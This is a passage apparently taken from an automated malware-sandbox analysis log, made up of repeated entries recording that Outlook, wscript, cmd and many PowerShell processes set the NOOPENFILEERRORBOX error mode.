              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
